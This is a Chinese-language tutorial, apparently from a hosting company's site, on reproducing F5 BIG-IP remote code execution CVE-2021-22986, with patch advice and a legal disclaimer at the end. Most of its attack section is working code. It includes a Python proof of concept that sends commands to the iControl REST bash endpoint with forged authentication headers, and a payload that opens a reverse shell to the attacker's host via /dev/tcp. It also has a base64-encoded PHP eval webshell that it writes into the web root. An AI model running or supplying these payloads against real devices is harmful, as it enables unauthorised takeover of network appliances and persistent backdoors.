溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現F5 BIG-IP 遠程代碼執行漏洞CVE-2021-22986復現

發布時間:2021-12-29 17:50:47 來源:億速云 閱讀:229 作者:柒染 欄目:安全技術
# 怎么實現F5 BIG-IP 遠程代碼執行漏洞CVE-2021-22986復現

## 漏洞概述

CVE-2021-22986是F5 BIG-IP設備中一個高危的遠程代碼執行漏洞,影響以下版本:
- 16.0.0 - 16.0.1
- 15.1.0 - 15.1.2
- 14.1.0 - 14.1.3.1
- 13.1.0 - 13.1.3.5
- 12.1.0 - 12.1.5.2

該漏洞存在于iControl REST認證組件中,未經認證的攻擊者可通過構造特殊請求實現遠程代碼執行。

## 環境準備

### 實驗環境要求
1. 受影響的F5 BIG-IP虛擬設備(可使用官方試用版)
2. Kali Linux攻擊機
3. 網絡互通的環境

### 工具安裝
```bash
# 安裝必要工具
sudo apt update
sudo apt install -y python3 python3-pip curl nmap

# 安裝漏洞利用相關庫
pip3 install requests urllib3

漏洞驗證步驟

第一步:目標識別

使用nmap掃描目標開放端口:

nmap -sV -p 443 <target_ip>

確認目標是否開放443端口且服務為F5 BIG-IP。

第二步:版本確認

通過HTTP請求獲取版本信息:

curl -k https://<target_ip>/mgmt/tm/sys/version -v

返回結果類似:

{"kind":"tm:sys:version:versionstats","selfLink":"https://localhost/mgmt/tm/sys/version","entries":{"https://localhost/mgmt/tm/sys/version/0":{"nestedStats":{"entries":{"Build":{"description":"0.0.6"}..."Product":{"description":"BIG-IP"},"Version":{"description":"16.0.1"}}}}}

第三步:漏洞檢測POC

使用Python檢測腳本:

import requests
import urllib3
urllib3.disable_warnings()

target = "https://<target_ip>"
path = "/mgmt/tm/util/bash"
headers = {
    "Authorization": "Basic YWRtaW46",  # 默認憑據嘗試
    "X-F5-Auth-Token": "a",
    "Content-Type": "application/json"
}
data = '{"command":"run","utilCmdArgs":"-c id"}'

try:
    response = requests.post(
        f"{target}{path}",
        headers=headers,
        data=data,
        verify=False,
        timeout=5
    )
    if "commandResult" in response.text:
        print("[+] 漏洞存在!響應:", response.text)
    else:
        print("[-] 目標可能不受影響")
except Exception as e:
    print("[!] 請求失敗:", str(e))

完整漏洞利用

方法一:通過RCE獲取反向Shell

  1. 在攻擊機監聽端口:
nc -lvnp 4444
  1. 執行反彈Shell命令(需編碼):
payload = '{"command":"run","utilCmdArgs":"-c \'bash -i >& /dev/tcp/<your_ip>/4444 0>&1\'"}'
response = requests.post(
    f"{target}{path}",
    headers=headers,
    data=payload,
    verify=False
)

方法二:上傳WebShell

upload_payload = {
    "command": "run",
    "utilCmdArgs": "-c 'echo PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7Pz4= | base64 -d > /var/www/html/shell.php'"
}

修復建議

  1. 官方解決方案:

    • 升級到以下修復版本:
      • 16.1.0+
      • 15.1.3+
      • 14.1.4+
      • 13.1.4+
      • 12.1.6+
  2. 臨時緩解措施:

    # 限制iControl REST接口訪問
    tmsh modify /sys httpd allow replace-all-with { 127.0.0.1 }
    tmsh save /sys config
    

法律聲明

本文僅用于安全研究和授權測試。未經授權對他人系統進行測試屬于違法行為。所有實驗應在隔離環境或獲得明確授權后進行。

參考鏈接

  1. F5官方公告
  2. CVE詳細報告
  3. MITRE ATT&CK相關技術

”`

注意:實際復現時請確保: 1. 使用虛擬機環境 2. 不要對公網未授權設備測試 3. 遵守當地網絡安全法律法規

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女